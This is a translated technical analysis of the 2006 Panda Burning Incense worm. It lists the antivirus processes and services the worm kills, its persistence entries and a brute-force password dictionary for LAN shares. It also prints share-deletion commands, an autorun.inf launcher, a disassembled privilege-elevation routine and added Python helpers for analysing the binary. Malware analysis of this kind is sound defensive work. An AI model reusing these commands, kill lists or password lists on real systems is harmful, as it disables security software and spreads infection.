Technical Analysis of the Panda Burning Incense (熊猫烧香) Virus and Emergency Remediation

By Delphiscn (http://blog.csdn.net/delphiscn) cnBlaster#hotmail.com

Contents
A. Introduction
B. Sample Analysis
C. Virus Characteristics and Behavior
D. Disassembly and Source Code Analysis
E. Remediation

A. Introduction
In early December 2006, a strange virus marked by an image of a panda holding burning incense sticks appeared on the network, infecting the computers of nearly a thousand enterprises and countless individual users. Infection mainly occurred through websites into which the virus had been planted: once a user visited such a site, the virus file was very likely to be triggered. The Panda Burning Incense virus not only damages the user's system, rendering a large number of applications unusable, but also deletes files, destroying the user's system backups so that the system cannot even be restored; at the same time it automatically terminates the processes of many anti-virus products, greatly reducing the security of the system.

B. Sample Analysis
Name: setup.exe
Type: Worm
File size: 22886 bytes
MD5: 9749216A37D57CF4B2E528C027252062
Environment: Borland Delphi 6.0-7.0 & UPack
Systems Affected: Windows 98/ME, Windows 2000/NT, Windows XP, Windows 2003

C. Virus Characteristics and Behavior

Characteristics
1. Shuts down numerous anti-virus products and security tools
2. Loops through the directories of every disk (including removable storage) infecting files, skipping critical system files
3. Infects all EXE, SCR, PIF and COM files and changes their icon to the burning-incense panda
4. Infects all .htm/.html/.asp/.php/.jsp/.aspx files, appending malicious trojan code
5. Automatically deletes *.gho files, preventing users from restoring data with Ghost

Behavior
1. Copies itself
After it runs, the virus copies itself to
C:\WINDOWS\System32\Drivers\spoclsv.exe

2. Adds a registry autostart entry
The virus adds an autostart entry under
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

3. Every second, enumerates desktop windows and closes any program whose window title contains one of the following strings
天网防火墙进程
VirusScan
网镖杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马克星
木马清道夫
木馬清道夫
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
qqKav
qqAV
qq病毒注册表编辑器
Windows 任务管理器
小沈q盗杀手
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
PJF(ustc)
IceSword (the security tool IceSword is closed by a keyboard-mapping method, i.e. simulated keystrokes)

4. Every 18 seconds
Requests a web page specified by the virus author, then uses the command line to check whether shares exist on the system;
if they do, runs the net share command to remove the admin$ share

5. Every 10 seconds
Downloads a file specified by the virus author, then uses the command line to check whether shares exist on the system;
if they do, runs the net share command to remove the admin$ share

6. Every 6 seconds
Deletes the security software values from the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RavTask
KvMonXP
kav
KAVPersonal50
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStartEXE
YLive.exe
yassistse
Modifies the following value so that hidden files are not shown
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue -> 0x00

7. Terminates the following processes on the system
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe

8. Deletes the following startup entries
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

9. Terminates the following services
kavsvc
AVP
AVP
kavsvc
McAfeeFramework
McShield
McTaskManager
McAfeeFramework
McShield
McTaskManager
navapsvc
KVWSC
KVSrvXP
KVWSC
KVSrvXP
Schedule
sharedaccess
RsCCenter
RsRavMon
RsCCenter
RsRavMon
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec
Core LC
NPFMntor
MskService
FireSvc

10. Searches for and infects all .EXE/.SCR/.PIF/.COM files outside the following directories, marking each infected file (and deletes every .GHO file it finds along the way)
WINDOWS
Winnt
System Volume Information
Recycled
Windows NT
Windows Update
Windows Media Player
Outlook Express
Internet Explorer
NetMeeting
Common Files
ComPlus
Applications
Messenger
InstallShield Installation Information
MSN
Microsoft Frontpage
Movie Maker
MSN Gamin Zone

11. Adds itself to the following startup locations
\Documents and Settings\All Users\Start Menu\Programs\Startup\
\Documents and Settings\All Users\「开始」菜单\程序\启动\
\WINDOWS\Start Menu\Programs\Startup\
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\

12. Monitors and logs QQ activity and LAN file access to c:\test.txt, and tries to send the log via QQ messages

13. Attempts to access LAN shares and infect files there (as GameSetup.exe) using the following passwords
1234
password
6969
harley
123456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
12345678
12345
ccc
admin
5201314
qq520
1
12
123
1234567
123456789
654321
54321
111
000000
abc
pw
11111111
88888888
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
520
super
123asd
0
ihavenopass
godblessyou
enable
xp
2002
2003
2600
alpha
110
111111
121212
123123
1234qwer
123abc
007
aaaa
patrick
pat
administrator
root
sex
god
foobar
secrettest
test123
temp
temp123
win
pc
asdf
pwd
qwer yxcv
zxcv
home
xxx
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100
Administrator
Guest
admin
Root

14. Creates the following installer and autorun configuration files in the root of every drive and removable storage device
X:\setup.exe
X:\autorun.inf
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

15. Deletes hidden shares
cmd.exe /c net share $ /del /y
cmd.exe /c net share admin$ /del /y
cmd.exe /c net share IPC$ /del /y

16. Creates a startup entry:
Software\Microsoft\Windows\CurrentVersion\Run
svcshare -> \%system32%\drivers\spoclsv.exe

17. Disables the option to show hidden folders
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

D. Disassembly and Source Code Analysis
Opening the unpacked setup.exe in W32Dasm lets us read the specific details of the worm's PE file.

**********************Disassembly of setup.exe********************************
Disassembly of File: E:\setup.exe
Code Offset = 00000400, Code Size = 0000C800
Data Offset = 0000CC00, Data Size = 00000400

Number of Objects = 0008 (dec), Imagebase = 00400000h

Object01: CODE RVA: 00001000 Offset: 00000400 Size: 0000C800 Flags: 60000020
Object02: DATA RVA: 0000E000 Offset: 0000CC00 Size: 00000400 Flags: C0000040
Object03: BSS RVA: 0000F000 Offset: 0000D000 Size: 00000000 Flags: C0000000
Object04: .idata RVA: 00010000 Offset: 0000D000 Size: 00000E00 Flags: C0000040
Object05: .tls RVA: 00011000 Offset: 0000DE00 Size: 00000000 Flags: C0000000
Object06: .rdata RVA: 00012000 Offset: 0000DE00 Size: 00000200 Flags: 50000040
Object07: .reloc RVA: 00013000 Offset: 0000E000 Size: 00000C00 Flags: 50000040
Object08: .rsrc RVA: 00014000 Offset: 0000EC00 Size: 00000A00 Flags: 50000040

Tip: text following an asterisk (*) is explanatory commentary, for reference only.
*******************************************************************

From the data above we can see how the worm's code and data are laid out when it executes in memory. The worm's PE file is divided into 4 sections: text, bss, data and idata. When the Panda virus runs, it calls 14 DLL modules and 125 Win32 API functions in total. The 14 DLL modules are kernel32.dll, user32.dll, advapi32.dll, oleaut32.dll, kernel32.dll, advapi32.dll, kernel32.dll, mpr.dll, user32.dll, wsock32.dll, wininet.dll, advapi32.dll, netapi32.dll and URLMON.DLL; the 125 Win32 API functions are listed in the disassembly data below.
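The W32Dasm object table above is what connects the virtual addresses in the disassembly further down (e.g. push 0040D1E8) to the file offsets quoted from WinHex. As an added example that is not part of the original article, the following Python transcribes that table, expands each Flags value into its IMAGE_SCN_* bits, and converts between virtual addresses and file offsets: the Run-key string pushed as 0040D1E8 lands at file offset 0000C5E8, inside the region the WinHex note places at 0000C5C0, and the import-table "Addr:" values resolve to .idata.

```python
from dataclasses import dataclass
from typing import List, Optional

IMAGE_BASE = 0x00400000  # "Imagebase = 00400000h" in the W32Dasm header

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h IMAGE_SCN_*)
SCN_FLAGS = {
    0x00000020: "CNT_CODE",
    0x00000040: "CNT_INITIALIZED_DATA",
    0x00000080: "CNT_UNINITIALIZED_DATA",
    0x02000000: "MEM_DISCARDABLE",
    0x10000000: "MEM_SHARED",
    0x20000000: "MEM_EXECUTE",
    0x40000000: "MEM_READ",
    0x80000000: "MEM_WRITE",
}


@dataclass(frozen=True)
class Section:
    name: str
    rva: int      # address relative to ImageBase once the file is loaded
    offset: int   # position of the raw bytes in the file (what WinHex shows)
    size: int     # raw size of the section data
    flags: int    # Characteristics


# Transcribed from Object01..Object08 of the W32Dasm output above.
SECTIONS: List[Section] = [
    Section("CODE",   0x00001000, 0x00000400, 0x0000C800, 0x60000020),
    Section("DATA",   0x0000E000, 0x0000CC00, 0x00000400, 0xC0000040),
    Section("BSS",    0x0000F000, 0x0000D000, 0x00000000, 0xC0000000),
    Section(".idata", 0x00010000, 0x0000D000, 0x00000E00, 0xC0000040),
    Section(".tls",   0x00011000, 0x0000DE00, 0x00000000, 0xC0000000),
    Section(".rdata", 0x00012000, 0x0000DE00, 0x00000200, 0x50000040),
    Section(".reloc", 0x00013000, 0x0000E000, 0x00000C00, 0x50000040),
    Section(".rsrc",  0x00014000, 0x0000EC00, 0x00000A00, 0x50000040),
]


def describe_flags(flags: int) -> List[str]:
    """Expand a Characteristics value into its named bits, lowest bit first."""
    names = [name for bit, name in sorted(SCN_FLAGS.items()) if flags & bit]
    unknown = flags & ~sum(SCN_FLAGS)
    if unknown:
        names.append("UNKNOWN(0x%08X)" % unknown)
    return names


def section_for_rva(rva: int) -> Optional[Section]:
    """The section whose raw data covers this RVA; None for the header or BSS/.tls."""
    for s in SECTIONS:
        if s.size and s.rva <= rva < s.rva + s.size:
            return s
    return None


def va_to_file_offset(va: int) -> Optional[int]:
    """A VA from the disassembly (e.g. push 0040D1E8) -> WinHex file offset."""
    s = section_for_rva(va - IMAGE_BASE)
    if s is None:
        return None   # nothing on disk to show for this address
    return va - IMAGE_BASE - s.rva + s.offset


def file_offset_to_va(offset: int) -> Optional[int]:
    """Inverse: a WinHex file offset -> the VA the code references it by."""
    for s in SECTIONS:
        if s.size and s.offset <= offset < s.offset + s.size:
            return IMAGE_BASE + s.rva + (offset - s.offset)
    return None


if __name__ == "__main__":
    for s in SECTIONS:
        print("%-7s 0x%08X  %s" % (s.name, s.flags, "|".join(describe_flags(s.flags))))
    print("VA 0x0040D1E8 -> file offset 0x%X" % va_to_file_offset(0x0040D1E8))
    print("file offset 0x5EC0 -> VA 0x%08X" % file_offset_to_va(0x5EC0))
```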

+++++++++++++++++++ Imported Functions ++++++++++++++++++
Number of Imported Modules = 14 (decimal)

Import Module 001: kernel32.dll
Import Module 002: user32.dll
Import Module 003: advapi32.dll
Import Module 004: oleaut32.dll
Import Module 005: kernel32.dll
Import Module 006: advapi32.dll
Import Module 007: kernel32.dll
Import Module 008: mpr.dll
Import Module 009: user32.dll
Import Module 010: wsock32.dll
Import Module 011: wininet.dll
Import Module 012: advapi32.dll
Import Module 013: netapi32.dll
Import Module 014: URLMON.DLL

+++++++++++++++++++ Key Module Details +++++++++++++++

Import Module 001: kernel32.dll

Addr:00010366 hint(0000) Name: DeleteCriticalSection
Addr:0001037E hint(0000) Name: LeaveCriticalSection
Addr:00010396 hint(0000) Name: EnterCriticalSection
Addr:000103AE hint(0000) Name: InitializeCriticalSection
Addr:000103CA hint(0000) Name: VirtualFree
Addr:000103D8 hint(0000) Name: VirtualAlloc
Addr:000103E8 hint(0000) Name: LocalFree
Addr:000103F4 hint(0000) Name: LocalAlloc
Addr:00010402 hint(0000) Name: GetTickCount
Addr:00010412 hint(0000) Name: QueryPerformanceCounter
Addr:0001042C hint(0000) Name: GetVersion
Addr:0001043A hint(0000) Name: GetCurrentThreadId
Addr:00010450 hint(0000) Name: WideCharToMultiByte
Addr:00010466 hint(0000) Name: MultiByteToWideChar
Addr:0001047C hint(0000) Name: GetThreadLocale
Addr:0001048E hint(0000) Name: GetStartupInfoA
Addr:000104A0 hint(0000) Name: GetModuleFileNameA
Addr:000104B6 hint(0000) Name: GetLocaleInfoA
Addr:000104C8 hint(0000) Name: GetLastError
Addr:000104D8 hint(0000) Name: GetCommandLineA
Addr:000104EA hint(0000) Name: FreeLibrary
Addr:000104F8 hint(0000) Name: ExitProcess
Addr:00010506 hint(0000) Name: CreateThread
Addr:00010516 hint(0000) Name: WriteFile
Addr:00010522 hint(0000) Name: UnhandledExceptionFilter
Addr:0001053E hint(0000) Name: SetFilePointer
Addr:00010550 hint(0000) Name: SetEndOfFile
Addr:00010560 hint(0000) Name: RtlUnwind
Addr:0001056C hint(0000) Name: ReadFile
Addr:00010578 hint(0000) Name: RaiseException
Addr:0001058A hint(0000) Name: GetStdHandle
Addr:0001059A hint(0000) Name: GetFileSize
Addr:000105A8 hint(0000) Name: GetFileType
Addr:000105B6 hint(0000) Name: CreateFileA
Addr:000105C4 hint(0000) Name: CloseHandle

Import Module 002: user32.dll

Addr:000105DE hint(0000) Name: GetKeyboardType
Addr:000105F0 hint(0000) Name: MessageBoxA
Addr:000105FE hint(0000) Name: CharNextA

Import Module 003: advapi32.dll

Addr:00010618 hint(0000) Name: RegQueryValueExA
Addr:0001062C hint(0000) Name: RegOpenKeyExA
Addr:0001063C hint(0000) Name: RegCloseKey

Import Module 004: oleaut32.dll

Addr:00010658 hint(0000) Name: SysFreeString
Addr:00010668 hint(0000) Name: SysAllocStringLen

Import Module 005: kernel32.dll

Addr:0001068A hint(0000) Name: TlsSetValue
Addr:00010698 hint(0000) Name: TlsGetValue
Addr:000106A6 hint(0000) Name: LocalAlloc
Addr:000106B4 hint(0000) Name: GetModuleHandleA

Import Module 006: advapi32.dll

Addr:000106D6 hint(0000) Name: RegSetValueExA
Addr:000106E8 hint(0000) Name: RegOpenKeyExA
Addr:000106F8 hint(0000) Name: RegDeleteValueA
Addr:0001070A hint(0000) Name: RegCreateKeyExA
Addr:0001071C hint(0000) Name: RegCloseKey
Addr:0001072A hint(0000) Name: OpenProcessToken
Addr:0001073E hint(0000) Name: LookupPrivilegeValueA
Addr:00010756 hint(0000) Name: AdjustTokenPrivileges

Import Module 007: kernel32.dll

Addr:0001077C hint(0000) Name: WriteFile
Addr:00010788 hint(0000) Name: WinExec
Addr:00010792 hint(0000) Name: TerminateProcess
Addr:000107A6 hint(0000) Name: Sleep
Addr:000107AE hint(0000) Name: SetFilePointer
Addr:000107C0 hint(0000) Name: SetFileAttributesA
Addr:000107D6 hint(0000) Name: OpenProcess
Addr:000107E4 hint(0000) Name: LoadLibraryA
Addr:000107F4 hint(0000) Name: GetWindowsDirectoryA
Addr:0001080C hint(0000) Name: GetVersionExA
Addr:0001081C hint(0000) Name: GetTempPathA
Addr:0001082C hint(0000) Name: GetSystemDirectoryA
Addr:00010842 hint(0000) Name: GetProcAddress
Addr:00010854 hint(0000) Name: GetModuleHandleA
Addr:00010868 hint(0000) Name: GetModuleFileNameA
Addr:0001087E hint(0000) Name: GetLocalTime
Addr:0001088E hint(0000) Name: GetLastError
Addr:0001089E hint(0000) Name: GetFileAttributesA
Addr:000108B4 hint(0000) Name: GetDriveTypeA
Addr:000108C4 hint(0000) Name: GetCurrentProcess
Addr:000108D8 hint(0000) Name: FreeLibrary
Addr:000108E6 hint(0000) Name: FindNextFileA
Addr:000108F6 hint(0000) Name: FindFirstFileA
Addr:00010908 hint(0000) Name: FindClose
Addr:00010914 hint(0000) Name: FileTimeToLocalFileTime
Addr:0001092E hint(0000) Name: FileTimeToDosDateTime
Addr:00010946 hint(0000) Name: ExitProcess
Addr:00010954 hint(0000) Name: DeleteFileA
Addr:00010962 hint(0000) Name: CreateThread
Addr:00010972 hint(0000) Name: CreateFileA
Addr:00010980 hint(0000) Name: CopyFileA
Addr:0001098C hint(0000) Name: CompareStringA
Addr:0001099E hint(0000) Name: CloseHandle

Import Module 008: mpr.dll

Addr:000109B4 hint(0000) Name: WNetCancelConnectionA
Addr:000109CC hint(0000) Name: WNetAddConnection2A

Import Module 009: user32.dll

Addr:000109EE hint(0000) Name: keybd_event
Addr:000109FC hint(0000) Name: SetTimer
Addr:00010A08 hint(0000) Name: PostMessageA
Addr:00010A18 hint(0000) Name: MapVirtualKeyA
Addr:00010A2A hint(0000) Name: KillTimer
Addr:00010A36 hint(0000) Name: GetWindowTextA
Addr:00010A48 hint(0000) Name: GetMessageA
Addr:00010A56 hint(0000) Name: GetDesktopWindow
Addr:00010A6A hint(0000) Name: FindWindowExA
Addr:00010A7A hint(0000) Name: FindWindowA
Addr:00010A88 hint(0000) Name: DispatchMessageA
Addr:00010A9C hint(0000) Name: CharUpperBuffA

Import Module 010: wsock32.dll

Addr:00010ABA hint(0000) Name: WSACleanup
Addr:00010AC8 hint(0000) Name: WSAStartup
Addr:00010AD6 hint(0000) Name: gethostname
Addr:00010AE4 hint(0000) Name: gethostbyname
Addr:00010AF4 hint(0000) Name: socket
Addr:00010AFE hint(0000) Name: inet_ntoa
Addr:00010B0A hint(0000) Name: inet_addr
Addr:00010B16 hint(0000) Name: htons
Addr:00010B1E hint(0000) Name: connect
Addr:00010B28 hint(0000) Name: closesocket

Import Module 011: wininet.dll

Addr:00010B42 hint(0000) Name: InternetGetConnectedState
Addr:00010B5E hint(0000) Name: InternetReadFile
Addr:00010B72 hint(0000) Name: InternetOpenUrlA
Addr:00010B86 hint(0000) Name: InternetOpenA
Addr:00010B96 hint(0000) Name: InternetCloseHandle

Import Module 012: advapi32.dll

Addr:00010BBA hint(0000) Name: OpenServiceA
Addr:00010BCA hint(0000) Name: OpenSCManagerA
Addr:00010BDC hint(0000) Name: DeleteService
Addr:00010BEC hint(0000) Name: ControlService
Addr:00010BFE hint(0000) Name: CloseServiceHandle

Import Module 013: netapi32.dll

Addr:00010C22 hint(0000) Name: NetRemoteTOD
Addr:00010C32 hint(0000) Name: NetScheduleJobAdd

Import Module 014: URLMON.DLL

Addr:00010C52 hint(0000) Name: URLDownloadToFileA

+++++++++++++++++++ Exported Functions ++++++++++++++++++
Number of Exported Functions = 0000 (decimal)


Having gone through the Win32 API functions above, you probably already have a picture of some of the actions the worm performs when it fires. Next we use WinHex to look at the worm file's hexadecimal contents.

****************************************************************
B8 D0 D0 BB B0 AC C2 EA 2C 6D 6F 70 65 72 79 B6 D4 B4 CB C4 BE C2 ED B5 C4 B9 D8 D7 A2

*Viewing the hex in WinHex, the bytes at offset 0000C9D0 convert as text (ASCII/GBK) to the plaintext

感谢艾玛,mopery对此木马的关注 (i.e. "thanks to 艾玛 and mopery for their attention to this trojan")
****************************************************************

*Viewing the hex in WinHex, the bytes at offset 00005EC0 convert as text (ASCII/GBK) to the plaintext

天网防火墙进程
VirusScan
网镖杀毒
毒霸
瑞星
江民
超级兔子
优化大师
木马克星
木马清道夫
木馬清道夫
卡巴斯基反病毒
Symantec AntiVirus
Duba
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
超级巡警

*When running, the virus closes any program whose window title contains one of the strings above
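The string tables that WinHex shows at these offsets all share one record layout, which is the Delphi compiler's format for a constant string: a reference count of -1 (FF FF FF FF), a 4-byte little-endian length, the string bytes (GBK for the Chinese titles), a NUL, then padding to a 4-byte boundary. As an added example that is not part of the original article, this Python scanner recovers such a table from any byte blob; the sample bytes are constructed from the first entries of the offset-00005EC0 table, and it also serves the process-name and service-name tables further down.

```python
import struct
from typing import List, Tuple

MARKER = b"\xff\xff\xff\xff"   # refcount -1: a compile-time string constant

# Constructed sample: the first entries of the offset-00005EC0 table, byte for byte.
SAMPLE = bytes.fromhex(
    "FF FF FF FF 09 00 00 00 56 69 72 75 73 53 63 61 6E 00 00 00"   # "VirusScan"
    "FF FF FF FF 05 00 00 00 4E 4F 44 33 32 00 00 00"               # "NOD32"
    "FF FF FF FF 04 00 00 00 B6 BE B0 D4 00 00 00 00"               # 毒霸 (GBK bytes)
    "FF FF FF FF 04 00 00 00 C8 F0 D0 C7 00 00 00 00"               # 瑞星 (GBK bytes)
    "FF FF FF FF 12 00 00 00 53 79 6D 61 6E 74 65 63 20 41 6E 74"
    "69 56 69 72 75 73 00 00"                                        # "Symantec AntiVirus"
)


def align4(n: int) -> int:
    """Round up to the next multiple of 4; Delphi pads each constant this way."""
    return (n + 3) & ~3


def parse_delphi_strings(blob: bytes, codec: str = "gbk",
                         max_len: int = 1024) -> List[Tuple[int, str]]:
    """Return (offset_of_string_bytes, text) for every constant found in blob.

    Record: FF FF FF FF | uint32 LE length | <length> bytes | NUL | pad to 4.
    The function scans for the marker instead of assuming records sit back to
    back, because the dumps also contain bare, header-less copies of some names;
    a candidate is accepted only if its length is plausible and the byte right
    after the text is the NUL terminator.
    """
    found: List[Tuple[int, str]] = []
    i = 0
    while True:
        i = blob.find(MARKER, i)
        if i < 0 or i + 8 > len(blob):
            break
        (length,) = struct.unpack_from("<I", blob, i + 4)
        start, end = i + 8, i + 8 + length
        if 0 < length <= max_len and end < len(blob) and blob[end] == 0:
            raw = blob[start:end]
            try:
                text = raw.decode(codec)
            except UnicodeDecodeError:
                text = raw.decode("latin-1")   # keep going on undecodable bytes
            found.append((start, text))
            i = start + align4(length + 1)     # skip text, NUL and padding
        else:
            i += 1                             # not a record; keep scanning
    return found


def strings_only(blob: bytes, codec: str = "gbk") -> List[str]:
    """Just the decoded texts, in file order."""
    return [text for _, text in parse_delphi_strings(blob, codec)]


if __name__ == "__main__":
    for off, text in parse_delphi_strings(SAMPLE):
        print("+0x%04X  %s" % (off, text))
```

Run over the data region of a suspect Delphi binary, the same scan turns kill lists like these into candidate strings for detection signatures.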

****************************************************************

*Viewing the hex in WinHex, the bytes at offset 00006100 convert as text (ASCII) to the plaintext

Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
regedit.exe
msconfig.exe
taskmgr.exe

*When running, the virus terminates the processes of the programs listed above

****************************************************************

*Viewing the hex in WinHex, the bytes at offset 00006580 convert as text (ASCII) to the plaintext

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

****************************************************************

*Viewing the hex in WinHex, the bytes at offset 00009E60 convert as text (ASCII/GBK) to the plaintext

\Documents and Settings\All Users\Start Menu\Programs\Startup\
\Documents and Settings\All Users\「开始」菜单\程序\启动\
\WINDOWS\Start Menu\Programs\Startup\
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\

*When running, the virus adds itself to the startup locations above

****************************************************************
15 00 00 00 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 73 68 61 72 65 20 00 00 00 FF FF FF FF
09 00 00 00 24 20 2F 64 65 6C 20 2F 79 00 00 00 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 73
68 61 72 65 20 61 64 6D 69 6E 24 20 2F 64 65 6C 20 2F 79 00 55 8B EC 6A 00 6A 00 33 C0 55 68 A9

*Viewing the hex in WinHex, the bytes at offset 0000C4D0 convert as text (ASCII) to the plaintext

cmd.exe /c net share $ /del /y
cmd.exe /c net share admin$ /del /y

****************************************************************
FF FF FF FF 0B 00 00 00 73 70 63 6F 6C 73 76 2E 65 78 65 00 73 76 63 73 68 61 72 65 00 00 00 00
53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65
6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 00 00 00

*Viewing the hex in WinHex, the bytes at offset 0000C5C0 convert as text (ASCII) to the plaintext

Software\Microsoft\Windows\CurrentVersion\Run

****************************************************************
53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65
6E 74 56 65 72 73 69 6F 6E 5C 45 78 70 6C 6F 72 65 72 5C 41 64 76 61 6E 63 65 64 5C 46 6F 6C 64
65 72 5C 48 69 64 64 65 6E 5C 53 48 4F 57 41 4C 4C 5C 43 68 65 63 6B 65 64 56 61 6C 75 65 00 00

*Viewing the hex in WinHex, the bytes at offset 0000C610 convert as text (ASCII) to the plaintext

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
*i.e. it disables the option to show hidden folders

****************************************************************
FF FF FF FF 0B 00 00 00 3A 5C 73 65 74 75 70 2E 65 78 65 00 FF FF FF FF 0D 00 00 00 3A 5C 61 75
74 6F 72 75 6E 2E 69 6E 66 00 00 00 FF FF FF FF 51 00 00 00 5B 41 75 74 6F 52 75 6E 5D 0D 0A 4F
50 45 4E 3D 73 65 74 75 70 2E 65 78 65 0D 0A 73 68 65 6C 6C 65 78 65 63 75 74 65 3D 73 65 74 75
70 2E 65 78 65 0D 0A 73 68 65 6C 6C 5C 41 75 74 6F 5C 63 6F 6D 6D 61 6E 64 3D 73 65 74 75 70 2E
65 78 65 0D 0A 00 00 00

*Viewing the hex in WinHex, the bytes at offset 0000B920 convert as text (ASCII) to the plaintext

X:\setup.exe
X:\autorun.inf
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

****************************************************************

*Disassembling the unpacked setup.exe with W32Dasm and reading its assembly code, we find the routine by which the worm elevates its own privileges: it opens its process token, looks up SeDebugPrivilege, and enables it with AdjustTokenPrivileges

****************************************************************
* Referenced by a CALL at Address:
|:004062EC
|
:00406218 53 push ebx
:00406219 83C4D0 add esp, FFFFFFD0
:0040621C 8D442404 lea eax, dword ptr [esp+04]
:00406220 50 push eax ; TokenHandle
:00406221 6A20 push 00000020 ; DesiredAccess

* Reference To: kernel32.GetCurrentProcess, Ord:0000h
|
:00406223 E81CE9FFFF Call 00404B44
:00406228 50 push eax ; ProcessHandle

* Reference To: advapi32.OpenProcessToken, Ord:0000h
|
:00406229 E87EE8FFFF Call 00404AAC
:0040622E 8D442408 lea eax, dword ptr [esp+08]
:00406232 50 push eax ; lpLuid

* Possible StringData Ref from Code Obj ->"SeDebugPrivilege"
|
:00406233 68B4624000 push 004062B4
:00406238 6A00 push 00000000 ; lpSystemName

* Reference To: advapi32.LookupPrivilegeValueA, Ord:0000h
|
:0040623A E865E8FFFF Call 00404AA4 ;LookupPrivilegeValueA
:0040623F 8B442408 mov eax, dword ptr [esp+08]
:00406243 89442424 mov dword ptr [esp+24], eax
:00406247 8B44240C mov eax, dword ptr [esp+0C]
:0040624B 89442428 mov dword ptr [esp+28], eax
:0040624F C744242001000000 mov [esp+20], 00000001
:00406257 33DB xor ebx, ebx
:00406259 895C242C mov dword ptr [esp+2C], ebx
:0040625D 54 push esp ; ReturnLength
:0040625E 8D442414 lea eax, dword ptr [esp+14]
:00406262 50 push eax ; PreviousState
:00406263 6A10 push 00000010 ; BufferLength
:00406265 8D44242C lea eax, dword ptr [esp+2C]
:00406269 50 push eax ; NewState
:0040626A 6A00 push 00000000 ; DisableAllPrivileges
:0040626C 8B442418 mov eax, dword ptr [esp+18]
:00406270 50 push eax ; TokenHandle

* Reference To: advapi32.AdjustTokenPrivileges, Ord:0000h
|
:00406271 E826E8FFFF Call 00404A9C
:00406276 8B442408 mov eax, dword ptr [esp+08]
:0040627A 89442414 mov dword ptr [esp+14], eax
:0040627E 8B44240C mov eax, dword ptr [esp+0C]
:00406282 89442418 mov dword ptr [esp+18], eax
:00406286 C744241001000000 mov [esp+10], 00000001
:0040628E 83CB02 or ebx, 00000002
:00406291 895C241C mov dword ptr [esp+1C], ebx
:00406295 54 push esp
:00406296 6A00 push 00000000
:00406298 8B442408 mov eax, dword ptr [esp+08]
:0040629C 50 push eax
:0040629D 8D44241C lea eax, dword ptr [esp+1C]
:004062A1 50 push eax
:004062A2 6A00 push 00000000
:004062A4 8B442418 mov eax, dword ptr [esp+18]
:004062A8 50 push eax ; TokenHandle

* Reference To: advapi32.AdjustTokenPrivileges, Ord:0000h
|
:004062A9 E8EEE7FFFF Call 00404A9C ;AdjustTokenPrivileges
:004062AE 83C430 add esp, 00000030
:004062B1 5B pop ebx
:004062B2 C3 ret
